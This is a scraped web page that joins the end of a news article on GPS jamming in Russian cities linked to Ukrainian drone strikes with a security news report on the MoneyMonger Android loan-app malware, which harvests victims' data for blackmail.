Since Russia invaded Ukraine in February, GNSS signal disruption has been spotted multiple times. In March, the European Union Aviation Safety Agency issued an alert warning about satellite navigation systems being jammed or spoofed around Ukraine and in nearby regions. The United States has accused Russia of attempting to jam GPS, and reports say Russian jamming technologies have made Ukrainian drones inoperable during battles taking place on the ground.

The recently reported GPS interference in Russian cities may be linked to Ukraine’s attacks against Russian territories, Kannike says, although this remains unconfirmed. “The logical conclusion here is that this is a response to the Ukrainian strikes deep behind Russian lines,” Kannike says. 

At the start of December, Ukraine launched drone attacks against military bases inside Russia. This was followed by reports that the Pentagon supported the long-range strikes. Russia’s media and telecommunications agency Roskomnadzor did not respond to WIRED’s request for comment.

GPS jamming could stop drones from operating in the areas. Analysis of Russia’s electronic warfare capabilities says the country has multiple types of military equipment that can be used to interfere with GPS. This includes trucks and vehicles, equipped with scores of antennas, that can move to areas where officials may want to block signals. “This suggests that Russia is, at least for the winter, adopting a much more defensive posture where they're actually focused on preventing incidents in their homeland,” Kannike adds. “The days where Russians underestimate Ukrainian long-range strike capabilities is certainly over.”

GPS Signals Are Being Disrupted in Russian Cities

A previously undocumented Android malware campaign has been observed leveraging money-lending apps to blackmail victims into paying up with personal information stolen from their devices.
Mobile security company Zimperium dubbed the activity MoneyMonger, pointing out the use of the cross-platform Flutter framework to develop the apps.
MoneyMonger "takes advantage of Flutter's framework to

A previously undocumented Android malware campaign has been observed leveraging money-lending apps to blackmail victims into paying up with personal information stolen from their devices.

Mobile security company Zimperium dubbed the activity **MoneyMonger**, pointing out the use of the cross-platform Flutter framework to develop the apps.

MoneyMonger "takes advantage of Flutter's framework to obfuscate malicious features and complicate the detection of malicious activity by static analysis," Zimperium researchers Fernando Sanchez, Alex Calleja , Matteo Favaro, and Gianluca Braga said in a report shared with The Hacker news.

"Due to the nature of Flutter, the malicious code and activity now hide behind a framework outside the static analysis capabilities of legacy mobile security products."

The campaign, believed to be active since May 2022, is part of a broader effort previously disclosed by Indian cybersecurity firm K7 Security Labs.

None of the 33 apps used in the deceptive scheme have been distributed through the Google Play Store. The money lending applications, instead, are available through unofficial app stores or sideloaded to the phones via smishing, compromised websites, rogue ads, or social media campaigns.

Once installed, the malware poses a risk as it's designed to prompt the users to grant it intrusive permissions under the pretext of guaranteeing a loan, and harvest a wide range of private information.

The collected data – which includes GPS locations, SMSes, contacts, call logs, files, photos, and audio recordings – is then used as a pressure tactic to force victims into paying excessively high-interest rates for the loans, sometimes even in cases after the loan is repaid.

To make matters worse, the threat actors subject the borrowers to harassment by threatening to reveal their information, call people from the contact list, and send abusive messages and morphed photos from the infected devices.

The scale of the campaign is unclear owing to the use of sideloading and third-party app stores, but the rogue apps are estimated to have racked up over 100,000 downloads through the distribution vector.

"The extremely novel MoneyMonger malware campaign highlights a growing trend by malicious actors to use blackmail and threats to scam victims out of money," Richard Melick, director of mobile threat intelligence at Zimperium, said in a statement.

"Quick loan programs are often full of predatory models, such as high-interest rates and payback schemes, but adding blackmail into the equation increases the level of maliciousness."

The findings come two weeks after Lookout discovered nearly 300 mobile loan applications on Google Play and Apple's App Store that collectively have more than 15 million downloads and have been found engaging in predatory behavior.

These apps not only exfiltrate extraordinary volumes of user data but also come with hidden fees, high-interest rates, and payment terms that are used to strong-arm victims for payment on fraudulent loans.

"They exploit victims' desire for quick cash to ensnare borrowers into predatory loan contracts and require them to grant access to sensitive information such as contacts and SMS messages," Lookout noted late last month.

Developing countries are a prime target for dodgy loan apps, as digital lending has seen explosive growth in markets like India, where people are unwittingly turning to such platforms after being turned away by banks for failing to meet income requirements.

The exploitative nature of the personal loan terms has also led to multiple incidents of suicides in the country, prompting the Indian government to initiate work on an allowlist of legal digital lending apps that are permitted in app stores.

Google, in August, disclosed it had removed more than 2,000 credit disbursement apps from its Play Store in India since the start of the year for violating its terms.

The government has also sought urgent strict action by law enforcement agencies against loan apps, a majority of them Chinese-controlled, that have been found to use harassment, blackmail, and harsh recovery techniques.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel